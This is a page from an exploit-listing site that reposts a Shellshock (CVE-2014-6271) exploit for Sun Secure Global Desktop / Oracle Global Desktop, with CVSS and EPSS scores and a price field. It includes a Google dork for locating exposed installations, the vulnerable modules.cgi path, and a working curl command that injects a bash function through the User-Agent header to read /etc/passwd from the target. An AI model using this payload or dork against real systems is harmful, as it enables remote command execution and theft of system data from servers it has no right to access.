Advertisement






Sun Secure Global Desktop / Oracle Global Desktop Shellshock

CVE Category Price Severity
CVE-2014-6271 CWE-78 $10,000 High
Author Risk Exploitation Type Date
Unknown High Remote 2016-06-07
CPE
cpe:cpe:/a:oracle:sun_secure_global_desktop
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2016060045

Below is a copy:

Sun Secure Global Desktop / Oracle Global Desktop Shellshock# Exploit Title: ShellShock On Sun Secure Global Desktop & Oracle Global desktop
# Google Dork: intitle:Install the Sun Secure Global Desktop Native Client
# Date: 6/4/2016
# Exploit Author: [email protected]
# Vendor Homepage: http://www.sun.com/ & http://www.oracle.com/
# Software Link: http://www.oracle.com/technetwork/server-storage/securedesktop/downloads/index.html
# Version: 4.61.915
# Tested on: Linux
 
VULNERABLE FILE
http://target.com//tarantella/cgi-bin/modules.cgi
 
POC :
localhost@~#curl -A "() { :; }; echo; /bin/cat /etc/passwd" http://target.com/tarantella/cgi-bin/modules.cgi > xixixi.txt
 
localhost@~#cat xixixi.txt
which will print out the content of /etc/passwd file.



Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.